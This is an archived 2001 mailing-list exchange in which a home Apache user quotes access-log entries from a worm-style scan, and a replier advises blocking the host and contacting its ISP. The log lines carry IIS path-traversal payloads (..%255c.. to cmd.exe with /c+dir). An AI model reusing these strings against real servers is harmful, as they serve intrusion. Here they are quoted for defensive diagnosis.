High, On Mon, 29 Oct 2001, Ole Sebastian Stein wrote:
> We just got our ADSL and now have a server running Apache on a potato box > at home. DynDNS provides us with dynamic dns. > > Today I found these lines in my acces.log: > > 213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir > HT > TP/1.0" 404 210 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir > HTTP > /1.0" 404 208 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /c/winnt/system32/cmd.exe?/ > c+dir HTTP/1.0" 404 218 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /d/winnt/system32/cmd.exe?/ > c+dir HTTP/1.0" 404 218 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /scripts/..%255c../winnt/sy > stem32/cmd.exe?/c+dir HTTP/1.0" 404 232 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /_vti_bin/..%255c../..%255c > ../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 > 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET > /_mem_bin/..%255c../..%255c > ../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 > > and so on. To me it looks as if 213.145.168.244 is trying > to execute some file giving him root access. Are someone trying to > crack my machine? What should I do? > Looks like a harmless attempt, because it tries to open M$ files. If this goes on and on you might want to block acces from that host. Perhaps a previous user of your ip had a warez ftp server and people try to login to download stuff. Look from where the attack is coming: $ host 213.145.168.244 Name: 213-145-168-244.dd.nextgentel.com Address: 213.145.168.244 and send a mail to [EMAIL PROTECTED] to inform them. Greetz, Sebastiaan